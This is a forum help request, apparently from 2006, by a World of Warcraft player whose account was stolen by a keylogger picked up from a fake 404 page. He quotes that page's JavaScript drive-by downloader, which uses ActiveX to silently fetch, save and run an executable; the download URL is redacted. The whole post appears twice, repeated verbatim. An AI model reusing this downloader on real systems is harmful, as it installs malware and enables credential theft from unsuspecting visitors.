Purgedom2
2006-08-27, 20:39
This is my first time posting on these boards, so sorry ahead of time if this is the wrong forum.
Anyways, I seem to have picked up a Keylogger recently while browsing the forums over at www.worldofwarcraft.com.
There was a "Rogue PVP Video" thread floating around which contained a bad link that brought you to a fake 404 page that immediatly infected your computer with a keylogger.
I lost my account and character on World of warcraft, and i cannot get it back.
Anyways, I still have this keylogger on my comp. How do i get rid of it?
The program is in my processes under "Svchqs.exe" and it opens everytime i restart my computer.
My full forum post discussing and warning about this link can be found here:
http://forums.worldofwarcraft.com/thread.html?topicId=12952459&pageNo=1
Basically in the source of the page this happens:
"function gn(n){var number = Math.random()*n;return '~tmp'+Math.round(number)+'.exe';}try{dl="<<purposefully removed, link to an malicous exeutable>>";var df=document.createElement("object");df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var x=df.CreateObject("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P","");var S=df.CreateObject("Adodb.Stream","");S.type=1;x.open("GET", dl,0);x.send();fname1=gn(10000);var F=df.CreateObject("Scripting.FileSystemObject","");var tmp=F.GetSpecialFolder(0);fname1= F.BuildPath(tmp,fname1);S.Open();S.Write(x.responseBody);S.SaveToFile(fname1,2);S.Close();var Q=df.CreateObject("Shell.Application","");Q.ShellExecute(fname1,"","","open",0);}catch(i){i=1;} "
According to some guy in the forum, anyways. Im no computer genious, just a guy who likes to play video games and is bummed that all his hard work for 2 years is completely gone, and my account is still inaccessible, and the keylogger is STILL on my computer.
I have run Spybot, Adaware, AVG and updated everything. Its still there. I use windows XP professional.
Anyways, I seem to have picked up a Keylogger recently while browsing the forums over at www.worldofwarcraft.com.
There was a "Rogue PVP Video" thread floating around which contained a bad link that brought you to a fake 404 page that immediatly infected your computer with a keylogger.
I lost my account and character on World of warcraft, and i cannot get it back.
Anyways, I still have this keylogger on my comp. How do i get rid of it?
The program is in my processes under "Svchqs.exe" and it opens everytime i restart my computer.
My full forum post discussing and warning about this link can be found here:
http://forums.worldofwarcraft.com/thread.html?topicId=12952459&pageNo=1
Basically in the source of the page this happens:
"function gn(n){var number = Math.random()*n;return '~tmp'+Math.round(number)+'.exe';}try{dl="<<purposefully removed, link to an malicous exeutable>>";var df=document.createElement("object");df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var x=df.CreateObject("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P","");var S=df.CreateObject("Adodb.Stream","");S.type=1;x.open("GET", dl,0);x.send();fname1=gn(10000);var F=df.CreateObject("Scripting.FileSystemObject","");var tmp=F.GetSpecialFolder(0);fname1= F.BuildPath(tmp,fname1);S.Open();S.Write(x.responseBody);S.SaveToFile(fname1,2);S.Close();var Q=df.CreateObject("Shell.Application","");Q.ShellExecute(fname1,"","","open",0);}catch(i){i=1;} "
According to some guy in the forum, anyways. Im no computer genious, just a guy who likes to play video games and is bummed that all his hard work for 2 years is completely gone, and my account is still inaccessible, and the keylogger is STILL on my computer.
I have run Spybot, Adaware, AVG and updated everything. Its still there. I use windows XP professional.